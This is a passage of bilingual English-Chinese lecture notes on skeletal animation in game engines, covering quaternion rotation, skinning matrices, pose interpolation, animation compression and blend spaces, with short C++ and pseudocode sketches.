        $v_q=(0,v)=bi+cj+dk\quad v=\begin{bmatrix}b\\c\\d\end{bmatrix}$

    • Rotation

      • For vector $\mathbf v$, rotated by unit axis $u$ of angle $\theta$, the result vector $v’_q$

        对于向量 $\mathbf v$,按角度 $\theta$ 的单位轴 $u$ 旋转,结果向量 $v’_q$

    $$q=(\cos(\frac\theta2),\sin(\frac\theta2)x_u,\sin(\frac\theta2)y_u,\sin(\frac\theta2)z_u)$$

    $$v'_q=qv_qq^*=qv_qq^{-1}$$

    $u=\begin{bmatrix}x_u\\y_u\\z_u\end{bmatrix}$ is a unit vector that represents the rotation axis

    $u=\begin{bmatrix}x_u\\y_u\\z_u\end{bmatrix}$ 是表示旋转轴的单位向量
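
    ​$v'_q=qv_qq^*$ 的一个最小 C++ 示意如下(类型为演示用的假设;$q$ 为单位四元数时,其共轭即其逆):

    #include <cmath>

    struct Vec3 { float x, y, z; };
    struct Quat { float w, x, y, z; };

    static Quat mul(const Quat& a, const Quat& b) {     // Hamilton 乘积
        return { a.w * b.w - a.x * b.x - a.y * b.y - a.z * b.z,
                 a.w * b.x + a.x * b.w + a.y * b.z - a.z * b.y,
                 a.w * b.y - a.x * b.z + a.y * b.w + a.z * b.x,
                 a.w * b.z + a.x * b.y - a.y * b.x + a.z * b.w };
    }

    // 把向量 v 绕单位轴 u 旋转 theta:构造 q,再计算 q v q*
    Vec3 rotateByAxisAngle(const Vec3& v, const Vec3& u, float theta) {
        float h = theta * 0.5f, s = std::sin(h);
        Quat q  = { std::cos(h), s * u.x, s * u.y, s * u.z }; // 旋转四元数
        Quat vq = { 0.0f, v.x, v.y, v.z };                    // 向量写成纯四元数
        Quat qc = { q.w, -q.x, -q.y, -q.z };                  // 共轭(单位四元数的逆)
        Quat r  = mul(mul(q, vq), qc);
        return { r.x, r.y, r.z };
    }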

    Joint Pose

    ​关节动作

    Joint Pose - Orientation

    ​关节姿势 - 方向

    webp

    • Rotation -> Change the Orientation of joints

      旋转 -> 更改关节方向

    • Most skeleton poses change orientations of joints only

      大多数骨骼姿势仅改变关节的方向

    Joint Pose - Position

    webp

    • Translate ->change postion

      平移 -> 改变位置

    • Translate point $P$ to point $P’$ by vector $T$

      通过向量 $T$ 将点 $P$ 平移为点 $P'$

    webp

    • Usually not changed in humanoid skeleton except the pelvis, facial joint and other special joints

      人形骨骼除骨盆、面部关节等特殊关节外通常不发生改变

    • Used for stretching models

      用于拉伸模型

    Joint Pose - Scale

    webp

    • Scale -> change the size of the model

      缩放 -> 更改模型的大小

    • Uniform vs. Non-uniform Scale

      均匀比例与非均匀比例

    webp

    • Widely used in facial animation

      广泛应用于面部动画

    • Uniform and non-uniform scale facial joints

      均匀和不均匀比例的面部关节

    Joint Pose - Affine Matrix

    webp

    ​将变换旋转缩放用一个仿射矩阵表示。

    Joint Pose-Local Space to Model Space

    ​关节姿势:局部空间到模型空间

    webp

    For a joint $j$ in a skinned mesh

    ​对于蒙皮网格中的关节 $j$

    • $p(j)$ : Joint $j$'s parent joint

      $p(j)$ :关节 $j$ 的父关节

    • $M^l_{p(j)}$ : Joint $j$'s parent joint pose in local space

      $M^l_{p(j)}$ :关节 $j$ 的父关节在局部空间中的姿势

    $M^m_J$ : joint $J$'s pose in model space

    ​$M^m_J$:模型空间中关节 $J$ 的姿势

    • Walking the skeletal hierarchy from $J$ to the root:

      从 $J$ 到根遍历骨架层次结构:

    $$M_{J}^{m}=\prod_{j=J}^{0}M_{p(j)}^{l}$$
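
    ​沿父链自根向下累乘局部姿势,可以写成如下 C++ 示意(假设关节数组按“父在前、子在后”排序,并用行主序 3×4 仿射矩阵表示姿势,均为演示用的假设):

    #include <cstddef>
    #include <cstdint>
    #include <vector>

    struct Affine { float m[3][4]; }; // 旋转*缩放在 m[.][0..2],平移在 m[.][3]

    static Affine mul(const Affine& a, const Affine& b) { // a * b(先应用 b,再应用 a)
        Affine r{};
        for (int i = 0; i < 3; ++i)
            for (int j = 0; j < 4; ++j) {
                r.m[i][j] = (j == 3) ? a.m[i][3] : 0.0f;  // 隐含底行 [0 0 0 1]
                for (int k = 0; k < 3; ++k) r.m[i][j] += a.m[i][k] * b.m[k][j];
            }
        return r;
    }

    void localToModelSpace(const std::vector<Affine>& localPoses,
                           const std::vector<uint8_t>& parentIndex, // 根关节为 0xFF
                           std::vector<Affine>& modelPoses) {
        for (std::size_t j = 0; j < localPoses.size(); ++j)
            modelPoses[j] = (parentIndex[j] == 0xFF)      // 根关节没有父关节
                ? localPoses[j]
                : mul(modelPoses[parentIndex[j]], localPoses[j]); // 父关节已先算好
    }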

    Joint Pose interpolation-Local Space vs.Model Space

    ​关节姿态插值-局部空间与模型空间

    webp

    Local Space

    ​局部空间

    • Less data with delta transform

      通过增量变换减少数据

    • Convenient for interpolation or blend

      方便插值或混合

    webp

    Model Space

    ​模型空间

    • Incorrect for interpolation

      插值不正确

    Single joint Skinning

    ​单关节蒙皮

    webp

    Vertex $V$'s position in joint $J$'s local space is fixed

    ​顶点 $V$ 在关节 $J$ 的局部空间中的位置是固定的

    Attach the vertices of a mesh to a posed skeleton

    ​将网格的顶点附加到已摆好姿势的骨架上

    • Each vertex can be bound to one or more joints with a weight parameter

      每个顶点可以通过权重参数绑定到一个或多个关节

    • The vertex position in each bound joint’s local space is fixed

      每个绑定关节局部空间中的顶点位置是固定的

    Skinning Matrix

    ​蒙皮矩阵

    webp

    Bind Pose: the skeleton pose for binding

    绑定姿势:绑定的骨骼姿势

    For a mesh vertex $V$ which is bound to a joint $J$

    ​对于绑定到关节 $J$ 的网格顶点 $V$

    • $V^m_b$: $V$'s position in model space within bind pose

      $V^m_b$:$V$ 在模型空间绑定姿势中的位置

    • $V^l_b$ : $V$'s position in local space within bind pose

      $V^l_b$ :$V$ 在绑定姿势局部空间中的位置

    • $M^m_{b(j)}$: $J$'s pose in model space within bind pose

      $M^m_{b(j)}$:$J$ 在模型空间中的绑定姿势内的姿势

    $V$'s position in local space at any time $t$ is fixed as

    ​$V$ 在任何时刻 $t$ 在 局部空间 中的位置固定为

    $$V^l(t)\equiv V^l_b=(M_{b(J)}^m)^{-1}\cdot V_b^m$$


    $M^m_j(t)$: joint $J$'s pose in model space at time $t$

    ​$M^m_j(t)$:$J$ 在 $t$ 时刻在模型空间中的姿势

    $$M_J^m(t)=\prod_{j=J}^{0}M_{p(j)}^l(t)$$

    $V^m(t)$: $V$'s position in model space at time $t$

    ​$V^m(t)$:$V$ 在 $t$ 时刻在模型空间中的位置

    $$V^m(t)=M_J^m(t)\cdot V_b^l=M_J^m(t)\cdot(M_{b(J)}^m)^{-1}\cdot V_b^m$$

    • $(M_{b(J)}^m)^{-1}$: Inverse Bind Pose Matrix

    Skinning Matrix:

    $$K_J=M_J^m(t)\cdot(M_{b(J)}^m)^{-1}$$

    Representing a Skeleton in Memory

    ​代表内存中的骨骼

    • The name of the joint, either as a string or a hashed 32-bit string id

      关节的名称,可以是字符串,也可以是散列的 32 位字符串 ID

    • The index of the joint’s parent within the skeleton

      骨骼中关节父级的索引

    • The inverse bind pose transform is the inverse of the product of the translation, rotation and scale

      逆绑定姿势变换是平移、旋转和缩放乘积的逆

    struct Joint {
        const string m_joint_name;                  // the name of the joint
        UInt8        m_parent_joint_index;          // the index of the parent joint, or 0xFF if root
        Translation  m_bind_pose_translation;       // bind pose: translation
        Rotation     m_bind_pose_rotation;          // bind pose: rotation
        Scale        m_bind_pose_scale;             // bind pose: scale
        Matrix4X3    m_inverse_bind_pose_transform; // inverse bind pose 可以通过计算得到,不过为了节省时间,事先算好
    };

    struct Skeleton {
        UInt  m_joint_count; // number of joints
        Joint m_joints[];    // array of joints
    };

    Skinning Matrix Palette

    ​蒙皮矩阵调色板

    An array of skinning matrices for each joint

    ​每个关节的蒙皮矩阵数组

    • To be used by GPU in shaders

      由 GPU 在着色器中使用

    • Optimization: pre-multiply the transform matrix $M^w$ from model space to world space

      优化:预先乘上模型空间到世界空间的变换矩阵 $M^w$

      The optimized skinning matrix of joint $J$ is

      关节 $J$ 的优化蒙皮矩阵

    $$K'_J=M^w\cdot M_J^m(t)\cdot(M_{b(J)}^m)^{-1}$$

    Weighted Skinning with Multi-joints

    ​多关节加权蒙皮

    webp

    For a mesh vertex $V$ which is bound to $N$ joints

    ​对于绑定到 $N$ 关节的网格顶点 $V$

    • $W_i$: the Skinning Weight of the $i$-th bound joint

      $W_i$:第 $i$ 个绑定关节的蒙皮权重

    Weighted Skinning Blend

    ​加权蒙皮混合

    webp

    For a vertex $V$ which is bound to $N$ joints $J_0$ to $J_{N-1}$

    ​对于绑定到 $N$ 关节 $J_0$ 到 $J_{N-1}$ 的顶点 $V$

    • $K_{j_{i}}(t)$: the skinning matrix of joint $J_i$ at time $t$

      $K_{j_{i}}(t)$:关节 $J_i$ 在时间 $t$ 的蒙皮矩阵

    Transform $V$'s position in joint $J$'s local space to model space:

    ​将 $V$ 在关节 $J$ 的 局部空间 中的位置转换为 模型空间

    $$V_{J_i}^m(t)=K_{J_i}(t)\cdot V_{b(J_i)}^m$$

    $V$'s position in model space:

    ​$V$ 在模型空间中的位置:

    $$V^m(t)=\sum_{i=0}^{N-1}W_i\cdot V_{J_i}^m(t)$$
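
    ​把上式落到 CPU 侧的蒙皮代码,大致如下(C++ 示意;顶点最多绑定 4 个关节、3×4 矩阵布局均为常见但非必然的假设,palette 即蒙皮矩阵调色板):

    #include <vector>

    struct Vec3 { float x, y, z; };
    struct Affine { float m[3][4]; }; // 某个关节的蒙皮矩阵 K_Ji(t)

    static Vec3 transformPoint(const Affine& k, const Vec3& p) {
        return { k.m[0][0]*p.x + k.m[0][1]*p.y + k.m[0][2]*p.z + k.m[0][3],
                 k.m[1][0]*p.x + k.m[1][1]*p.y + k.m[1][2]*p.z + k.m[1][3],
                 k.m[2][0]*p.x + k.m[2][1]*p.y + k.m[2][2]*p.z + k.m[2][3] };
    }

    struct SkinnedVertex {
        Vec3  bindPos;       // V_b^m:绑定姿势下模型空间中的位置
        int   jointIndex[4]; // 最多绑定 4 个关节
        float weight[4];     // W_i,假设和为 1
    };

    // V^m(t) = sum_i W_i * K_Ji(t) * V_b^m,即上面的加权蒙皮混合
    Vec3 skinVertex(const SkinnedVertex& v, const std::vector<Affine>& palette) {
        Vec3 out{0.0f, 0.0f, 0.0f};
        for (int i = 0; i < 4; ++i) {
            Vec3 p = transformPoint(palette[v.jointIndex[i]], v.bindPos);
            out.x += v.weight[i] * p.x;
            out.y += v.weight[i] * p.y;
            out.z += v.weight[i] * p.z;
        }
        return out;
    }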

    Clip

    webp

    A sequence of skeleton poses

    ​一系列骨骼姿势

    Interpolation between Poses

    ​姿势之间的插值

    webp

    • Animation’s timeline is continuous

      动画的时间线是连续的

    Interpolation

    ​插值

    webp

    • Calculate the pose between key poses

      计算关键姿势之间的姿势

    Simple Interpolation of Translation and Scale

    ​平移和比例的简单插值

    • Linear interpolation (LERP)

      线性插值(LERP)

      $f(x)=(1-\alpha)f(x_1)+\alpha f(x_2)$

      $\alpha=\frac{x-x_1}{x_2-x_1},x_1<x_2,x\in[x_1,x_2]$

    webp

    Translation:

    $$T(t)=(1-\alpha)T(t_1)+\alpha T(t_2)$$

    Scale:

    $$S(t)=(1-\alpha)S(t_1)+\alpha S(t_2)$$

    Quaternion interpolation of Rotation

    ​旋转的四元数插值

    webp

    • NLERP for quaternion

      四元数的 NLERP

      • Linear interpolation

        线性插值

        $q_t=\mathrm{Lerp}(q_{t1},q_{t2},t)=(1-\alpha)q_{t1}+\alpha q_{t2}$

        $\alpha=\frac{t-t_1}{t_2-t_1},t_1<t_2,t\in[t_1,t_2]$

      • Normalization

        归一化

        $q_t'=\mathrm{Nlerp}(q_{t1},q_{t2},t)=\frac{(1-\alpha)q_{t1}+\alpha q_{t2}}{||(1-\alpha)q_{t1}+\alpha q_{t2}||}$

    Shortest Path Fixing of NLERP

    • The shortest path

    webp

    $$q_t=\begin{cases}\frac{(1-\alpha)q_{t1}+\alpha q_{t2}}{||(1-\alpha)q_{t1}+\alpha q_{t2}||}&q_{t1}\cdot q_{t2}\geq0\\\frac{(1-\alpha)q_{t1}-\alpha q_{t2}}{||(1-\alpha)q_{t1}-\alpha q_{t2}||}&q_{t1}\cdot q_{t2}<0\end{cases}$$

    $$\begin{aligned}&q_{t1}=a+bi+cj+dk\\&q_{t2}=e+fi+gj+hk\end{aligned}$$

    解得:

    $$\begin{aligned}
    q_{t1}\cdot q_{t2}&=ae+bf+cg+dh\\
    &=\cos(\theta)\,||q_{t1}||\,||q_{t2}||
    \end{aligned}$$

    webp

    Problem of NLERP

    webp

    Non-constant angular speed of NLERP

    ​NLERP 非恒定角速度

    SLERP: Uniform Rotation Interpolation

    ​SLERP:均匀旋转插值

    webp

    SLERP for quaternion

    ​四元数的 SLERP

    $$\begin{aligned}&q_t=\mathrm{Slerp}(q_{t1},q_{t2},t)=\frac{\sin\left((1-t)\theta\right)}{\sin\theta}\cdot q_{t1}+\frac{\sin\left(t\theta\right)}{\sin\theta}\cdot q_{t2}\\&\theta=\arccos(q_{t1}\cdot q_{t2})\end{aligned}$$

    ​用到了反三角函数,计算速度慢。

    NLERP vs. SLERP

    webp

    • NLERP

      • Non-constant angular speed

        非恒定角速度

      • Almost constant angular speed when $\theta$ is small

        当 $\theta$ 很小时,角速度几乎恒定

    • SLERP

      • Constant angular speed

        恒定角速度

      • May have zero-divide problem when $\theta$ is small

        当 $\theta$ 很小时可能会出现零除问题

    • Combination

      • Widely used in 3A-game development

        广泛应用于 3A 游戏开发

      • Use SLERP when $\theta$ is large, and NLERP when $\theta$ is almost zero

        当 $\theta$ 很大时使用 SLERP,当 $\theta$ 几乎为零时使用 NLERP

    Simple Animation Runtime Pipeline

    webp

    ​在 CPU 计算好变换后的动作,剩下的交给 GPU。

    Animation Compression

    ​动画压缩

    Animation Clip Storage

    ​动画剪辑存储

    webp

    • Animation clip is split into separate joint pose sequences

      动画剪辑分割为单独的关节姿势序列

    • Joint pose sequence is split into separate translation, rotation and scale tracks

      关节姿势序列分割为单独的平移、旋转和缩放轨道

    Animation Data Size

    ​动画数据大小

    • Single clip size estimation

      单个剪辑尺寸估计

    webp

    e.g. To develop a game containing over 150 unique characters, like League of Legends, each of which has 30 clips about 5 s long, it takes about 1.26~2.51 GB

    ​例如开发一款包含超过 150 个独特角色的游戏(例如英雄联盟),每个角色有 30 个长度约为 5 秒的剪辑,大约需要 1.26~2.51GB

    Distinction among Animation Tracks

    ​动画轨道的区别

    For the same joint, rotation, translation and scale changes vary greatly

    ​对于同一个关节,旋转、平移和尺度变化差别很大

    webp

    Distinction among Joints

    ​关节的区别

    webp

    The motion of different joints varies greatly

    ​不同关节的运动差异很大

    Simplest Compression - DoF Reduction

    ​最简单的压缩 - 自由度缩减(一般骨骼动画只有关节的旋转)

    • Scale

      缩放

      • Discard scale track (Usually not changed in humanoid skeleton except facial joints)

        丢弃比例轨迹(除面部关节外,人形骨骼中通常不会改变)

    • Translate

      平移

      • Discard translation track (Usually not changed in humanoid skeleton except the pelvis, facial joints and other special joints)

        丢弃平移轨迹(除了骨盆、面部关节和其他特殊部位外,人形骨骼中通常不改变)

    Keyframe

    webp

    A key frame (or keyframe) in animation and filmmaking is a drawing or shot that defines the starting and ending points of any smooth transition

    ​动画和电影制作中的关键帧是定义任何平滑过渡的起点和终点的绘图或镜头

    Keyframe Extraction - Linear Keys Reduction

    ​关键帧提取 - 线性关键点缩减

    webp

    ​Remove those frames which can be fitted by linear interpolation of adjacent frames

    ​删除那些可以通过相邻帧线性插值拟合的帧

    KeyFrame = {}
    for i = 1 to n-1 do
        // interpolate frame i from its neighbors (t = 0.5, assuming evenly spaced frames)
        frame_interp = Lerp(frame[i-1], frame[i+1], 0.5)
        error = Diff(frame[i], frame_interp)
        // keep frame i as a key frame only if interpolation cannot reproduce it
        if isNotAcceptable(error) then
            KeyFrame.insert(frame[i])
        end
    end

    Catmull-Rom Spline

    ​Catmull-Rom 样条线(有损压缩)

    webp

    Four control points $P_0$, $P_1$, $P_2$, $P_3$, will make a curve from $P_1$ to $P_2$

    ​四个控制点 $P_0$、$P_1$、$P_2$、$P_3$ 将形成一条从 $P_1$ 到 $P_2$ 的曲线

    • $\alpha$ : affects how sharply the curve bends at control points (usually $\alpha=0.5$)

      $\alpha$:影响曲线在控制点处的弯曲程度(通常$\alpha=0.5$)

    • $t$: the interpolation coefficient

      $t$:插值系数

    Interpolate on the curve with $t$ in range $(0,1)$

    ​在曲线上使用 $t$ 在 $(0,1)$ 范围内进行插值

    $$P(t)=\begin{bmatrix}1&t&t^2&t^3\end{bmatrix}\begin{bmatrix}0&1&0&0\\-\alpha&0&\alpha&0\\2\alpha&\alpha-3&3-2\alpha&-\alpha\\-\alpha&2-\alpha&\alpha-2&\alpha\end{bmatrix}\begin{bmatrix}P_0\\P_1\\P_2\\P_3\end{bmatrix}$$
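
    ​A minimal sketch (my own helper) that expands the matrix form above per component to evaluate one segment between $P_1$ and $P_2$:

    struct Vec3 { float x, y, z; };

    Vec3 CatmullRom(const Vec3& p0, const Vec3& p1, const Vec3& p2, const Vec3& p3,
                    float t, float alpha = 0.5f) {
        // P(t) = [1 t t^2 t^3] * M(alpha) * [P0 P1 P2 P3]^T, expanded into
        // polynomial coefficients and evaluated with Horner's rule.
        auto eval = [&](float a, float b, float c, float d) {
            float c0 = b;
            float c1 = -alpha * a + alpha * c;
            float c2 = 2.0f * alpha * a + (alpha - 3.0f) * b + (3.0f - 2.0f * alpha) * c - alpha * d;
            float c3 = -alpha * a + (2.0f - alpha) * b + (alpha - 2.0f) * c + alpha * d;
            return c0 + t * (c1 + t * (c2 + t * c3));
        };
        return { eval(p0.x, p1.x, p2.x, p3.x),
                 eval(p0.y, p1.y, p2.y, p3.y),
                 eval(p0.z, p1.z, p2.z, p3.z) };
    }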

    webp

    Fitting Process

    • Make a Catmull-Rom spline with the middle 2 control points at both ends of the original curve

      制作一条 Catmull-Rom 样条线,中间 2 个控制点位于原始曲线的两端

    • Iteratively add control points like binary search

      像二分搜索一样迭代地添加控制点

    • Calculate inner curve by the closest 4 points

      通过最接近的 4 个点计算内曲线

    • Repeat until the error of each frame is under the threshold

      重复直到每帧的误差低于阈值

    Float Quantization

    Use less bits integer to represent limited range and accuracy float value

    ​使用较少位的整数来表示有限范围和精度的浮点值

    $$\text{DesiredBits}=\left\lceil\log_2\frac{\text{Range}}{\text{Accuracy}}\right\rceil$$

    Example: translation range $[0, 10]$ m, accuracy 0.001 m:

    ​示例:平移范围 $[0, 10]$ 米,精度 0.001 米:

    $$\text{DesiredBits}=\left\lceil\log_2\frac{10}{0.001}\right\rceil=14\ \text{bits}$$

    In general, 16 bits can cover pose’s float range and accuracy requirements in the game engine

    ​一般来说,16 位可以覆盖游戏引擎中 pose 的浮动范围和精度要求

    Example of linearly quantizing a 32-bit float to a 16-bit unsigned integer.

    ​将 32 位浮点数线性量化为 16 位无符号整数的示例
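
    ​A minimal sketch of this linear quantization and its inverse (the function names are mine):

    #include <cmath>
    #include <cstdint>

    // Map a float in [min, max] to a 16-bit unsigned integer.
    uint16_t QuantizeFloat16(float value, float min, float max) {
        float normalized = (value - min) / (max - min);   // map to [0, 1]
        if (normalized < 0.0f) normalized = 0.0f;
        if (normalized > 1.0f) normalized = 1.0f;
        return static_cast<uint16_t>(std::lround(normalized * 65535.0f));
    }

    // Recover an approximation of the original float.
    float DequantizeFloat16(uint16_t q, float min, float max) {
        return min + (static_cast<float>(q) / 65535.0f) * (max - min);
    }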

    webp

    Quaternion Quantization

    ​四元数量化

    • 3 numbers are enough to represent a unit quaternion, e.g. $q=(a,b,c,\sqrt{1-(a^2+b^2+c^2)})$

      3 个数字足以表示一个单位四元数,例如 $q=(a,b,c,\sqrt{1-(a^2+b^2+c^2)})$

    • The range of the remaining 3 numbers can be limited to $\left[-\frac{1}{\sqrt2}, \frac{1}{\sqrt2}\right]$, if we always omit the number with the largest absolute value

      其余 3 个数字的范围可以限制在 $\left[-\frac{1}{\sqrt2}, \frac{1}{\sqrt2}\right]$ 中,如果总是省略绝对值最大的数字

    $$a^2+b^2+c^2+d^2=1,\quad|a|\geq\max(|b|,|c|,|d|)$$

    $$2b^2\leq a^2+b^2\leq a^2+b^2+c^2+d^2=1$$

    $$b^2\leq\frac12\Rightarrow-\frac1{\sqrt2}\leq b\leq\frac1{\sqrt2}$$

    Similarly 类似地, $-\frac1{\sqrt{2}}\leq c\leq\frac1{\sqrt{2}}$ and $-\frac1{\sqrt{2}}\leq d\leq\frac1{\sqrt{2}}$

    webp

    • Use 2 bits to represent which number is discarded

      使用 2 位来表示哪个数字被丢弃

    • Use 15 bits of storage for each number, ranged in $\left[-\frac{1}{\sqrt2},\frac{1}{\sqrt2}\right]$, precision $\sqrt2/32767≈0.000043$

      每个数字使用 15 位存储,范围为$\left[-\frac{1}{\sqrt2},\frac{1}{\sqrt2}\right]$,精度$\sqrt2/32767≈0.000043$

    • Finally a quaternion can be stored in 48 bits of storage, cut down from 128 bits (a code sketch follows below)

      最终四元数可以存储在 48 位存储器中,从 128 位减少
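
    ​A minimal sketch of this "smallest three" scheme (the bit layout is my own: 2 bits for the omitted index plus 3 × 15 bits, 47 bits total packed into a uint64_t):

    #include <cmath>
    #include <cstdint>

    uint64_t CompressQuat(const float q[4]) {
        // Find the component with the largest absolute value; it will be omitted.
        int largest = 0;
        for (int i = 1; i < 4; ++i)
            if (std::fabs(q[i]) > std::fabs(q[largest])) largest = i;
        // Flip signs so the omitted component is positive; the decompressor can
        // then reconstruct it as sqrt(1 - sum of the other three squares).
        float sign = (q[largest] < 0.0f) ? -1.0f : 1.0f;

        const float kRange = 1.0f / std::sqrt(2.0f);  // remaining values lie in [-kRange, kRange]
        uint64_t packed = static_cast<uint64_t>(largest);             // 2 bits
        for (int i = 0; i < 4; ++i) {
            if (i == largest) continue;
            float v = sign * q[i] / kRange;                           // now in [-1, 1]
            uint32_t u = static_cast<uint32_t>(std::lround((v * 0.5f + 0.5f) * 32767.0f));
            packed = (packed << 15) | (u & 0x7FFF);                   // 15 bits each
        }
        return packed;                                                // 47 of 48 bits used
    }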

    Size Reduction from Quantization

    ​量化的尺寸减小

    webp

    • The key point of quantization is to find a proper error threshold, and use as few bits of storage as possible

      量化的关键是找到合适的误差阈值,并使用尽可能少的存储位

    • Keyframe extraction and quantization can be used together to obtain a better compression ratio

      关键帧和量化可以一起使用以获得更好的压缩比

    Error Propagation

    ​误差传播

    webp

    Error caused by compression of animation data will accumulate between bones

    ​动画数据压缩引起的误差会在骨骼之间累积

    • Bones store local space transformation data

      骨骼存储局部空间变换数据

    • Bones are organized in a hierarchy

      骨骼按层次结构组织

    Joint Sensitivity to Error

    ​关节对误差的敏感性

    Some special parts require high-precision animation.

    ​一些特殊部位需要高精度的动画。

    webp

    ​由动画有损压缩导致的动画错误。

    Measuring Accuracy - Data Error

    ​测量精度 - 数据误差

    webp

    Calculate the error as the diff between the interpolated transform data and the original

    ​用插值得到的变换数据与原始数据之间的差异来计算误差

    • Translation Error: $||T_1-T_2||$
    • Rotation Error: $||R_1-R_2||$
    • Scale Error: $||S_1-S_2||$

    Measuring Accuracy - Visual Error

    ​测量精度 - 视觉误差

    webp

    Calculate the error as the diff between the interpolated vertex and the desired vertex

    ​用插值得到的顶点与目标顶点之间的差异来计算误差

    webp

    Hard to calculate the visual error of every vertex

    ​很难计算每个顶点的视觉误差

    • Great amount of calculation

      计算量大

    Estimate the visual error

    ​估计视觉误差

    • Fake vertex: Two orthogonal virtual vertices at a fixed distance from the joint (not co-linear with the joint rotation axis)

      假顶点:距关节固定距离的两个正交虚拟顶点(与关节旋转轴不共线)

    • Fake Vertex Distance Approximation

      假顶点距离近似

      • character bones 2~10cm

        人物骨头 2~10 厘米

      • large animated objects 1~10m

        大型动画物体 1~10m

    Error Compensation - Adaptive Error Margins

    ​误差补偿 - 自适应误差裕度

    webp

    • Adaptive Error Margins

      自适应误差容限

      • Use different accuracy thresholds for different joints from end to root, in order to reduce the error caused by parent joints

        对从末端到根部的不同关节使用不同的精度阈值,以减少父关节引起的误差

    Error Compensation - in Place Correction

    ​误差补偿 - 就地校正

    webp

    • Process

      过程

      • Select a point on every bone except root

        在除根部之外的每个骨骼上选择一个点

      • Compute the rotation of every compressed bone from root that takes the tagged point closest to its actual position in model space

        计算从根部开始的每个压缩骨骼的旋转,使标记点最接近其在模型空间中的实际位置

      • Add the rotation to the transform of the compressed data

        添加旋转来转换压缩数据

    • Pros

      优点

      • No overhead during decompression since all data is already computed during compression

        解压期间没有开销,因为所有数据已在压缩期间计算

    • Cons

      缺点

      • May produce memory overhead because of possible modification to ConstantTrack

        由于可能对 ConstantTrack 进行修改,可能会产生内存开销

      • May produce NoiseTrack because it directly changes keyframe data

        可能会产生 NoiseTrack,因为它直接更改关键帧数据

      • Compression may cost more time

        压缩可能会花费更多时间

    Animation DCC Process

    In general, the Animation DCC (Digital Content Creation) process includes:

    ​一般来说,动画 DCC(数字内容创建)过程包括:

    • Mesh

      网格

    • Skeleton binding

      骨骼绑定

    • Skinning

      蒙皮

    • Animation creation

      制作动画

    • Exporting

      输出

    Mesh building

    webp

    • Blockout Stage: Create a rough outline of the character

      草图阶段:创建角色的粗略轮廓

    • High Poly Stage: improve the building precision

      高多边形阶段:提高模型精度

    • Low Poly Stage: Divide the surface into meshes

      低多边形阶段:将表面划分为网格

    • Texture Stage: Add texture to character

      纹理阶段:为角色添加纹理

    Mesh Adjustment for Animation

    ​动画的网格调整

    webp

    • Mesh division is vital for animation creation; it defines how the skin curves

      网格划分对于动画创建至关重要,它定义了皮肤的弯曲方式

    • Animation turns to be weird if the meshes are too sparse

      如果网格太稀疏,动画会变得很奇怪

    • Dense meshes cause a performance overhead

      密集的网格会导致性能开销

    Exporting

    webp

    • FBX file
      • Model mesh
      • skeleton
      • skinning data
      • animation clip

    FBX: the industry-standard 3D asset exchange file format for games. It is developed by Autodesk as a proprietary format.

    ​FBX:游戏的行业标准 3D 资产交换文件格式。它是由 Autodesk 开发的专有格式。

    第九节:高级动画技术:动画树、IK 和表情动画

    Animation System

    Advanced Animation Technology

    ​高级动画技术

    How to Achieve the Animation Effect in Real Game?

    ​如何实现真实游戏中的动画效果?

    webp

    ​将动画师制作的各种 simple animation clips 混合成 complex animations。

    Animation Blending

    • The term animation blending refers to any technique that allows more than one animation clip to contribute to the final pose of the character

      术语“动画混合”是指允许多个动画剪辑为角色的最终姿势做出贡献的任何技术

    Case: Walking to Running

    webp

    • Assume the character walks at 1.5m/s and runs at 3.0m/s in our game

      假设角色在我们的游戏中以 1.5m/s 的速度行走并以 3.0m/s 的速度奔跑

    • As the character’s speed increase, we want to switch its animation from walking to running

      随着角色速度的增加,我们希望将其动画从步行切换为跑步

    Math of Blending: LERP

    webp

    Use LERP to get intermediate frame from poses of different clips

    ​使用 LERP 从不同剪辑的姿势中获取中间帧

    Weight is controlled by game parameters, e.g. character speed

    ​权重由游戏参数控制,例如角色速度

    Calculate Blend Weight

    ​计算混合权重(依据速度)

    | 参数 | 描述 |
    | --- | --- |
    | $\text{speed}_{\text{current}}$ | current speed |
    | $\text{speed}_1$ | speed of clip1 |
    | $\text{speed}_2$ | speed of clip2 |
    | $\text{weight}_1$ | calculated weight of clip1 |
    | $\text{weight}_2$ | calculated weight of clip2 |

    $$weight_1=\frac{speed_{current}-speed_2}{speed_1-speed_2}$$

    $$\mathrm{weight}_2=\frac{\mathrm{speed}_{current}-\mathrm{speed}_1}{\mathrm{speed}_2-\mathrm{speed}_1}$$
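
    ​A minimal sketch of this computation, clamped to the valid range (my own helper):

    // weight1 for clip1; weight2 = 1 - weight1.
    float ComputeBlendWeight1(float speedCurrent, float speed1, float speed2) {
        float w1 = (speedCurrent - speed2) / (speed1 - speed2);
        if (w1 < 0.0f) w1 = 0.0f;
        if (w1 > 1.0f) w1 = 1.0f;
        return w1;
    }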

    Align Blend Timeline

    ​对齐混合时间线

    webp

    Case: Walking to Running

    In order to achieve the desired effect, we need a lot of animation clips with intermediate speeds.

    ​为了达到想要的效果,我们需要大量中等速度的动画片段。

    Let the animators produce a whole bunch?

    ​让动画师制作一大堆?(这是不可能的)

    Blend Space

    ​混合空间

    1D Blend Space: Directional Movement

    ​一维混合空间:定向运动

    webp

    Players can move forward from multiple angles

    ​玩家可以从多个角度前进

    We can blend any angle from three clips:

    ​我们可以混合三个剪辑中的任意角度:

    • Strafe Left clip
    • Run Forward clip
    • Strafe Right clip

    The technique is called 1D Blend Space.

    ​该技术称为一维混合空间。

    Directional Walking and Running

    ​定向步行和跑步

    webp

    Players can change direction and speed at the same time

    ​玩家可以同时改变方向和速度

    We simply place the two 1D Blend Spaces orthogonally and we get a 2D Blend Space

    ​我们只需将两个一维混合空间正交放置,就得到一个二维混合空间

    2D Blend Space

    webp

    Since the movement speed in the lateral direction is lower than in the forward direction, the character should enter the running state at a lower speed in the lateral direction

    ​由于横向移动速度在前进方向上较低,因此角色应该以较低的横向速度进入奔跑状态

    Case: Applauding on Different Poses

    ​案例:不同姿势鼓掌

    webp

    There are multiple robots in different poses in the scene

    ​场景中有多个机器人摆出不同的姿势

    We need to make applause animations for various poses separately

    ​我们需要分别为各种姿势制作掌声动画

    Is it possible to make a single applauding animation that can be applied to all poses?

    ​是否可以制作一个可以应用于所有姿势的鼓掌动画?

    Skeleton Masked Blending

    ​骨架蒙版混合

    webp

    The set of all blend percentages for the entire skeleton $\{\beta_j\}_{j=0}^{N-1}$ is sometimes called a blend mask $b$

    ​整个骨架的所有混合百分比的集合 $\{\beta_j\}_{j=0}^{N-1}$ 有时称为混合蒙版 $b$

    Case: Warm Welcome from the Robots

    ​案例:机器人的热烈欢迎

    webp

    We will let robots applaud in different poses

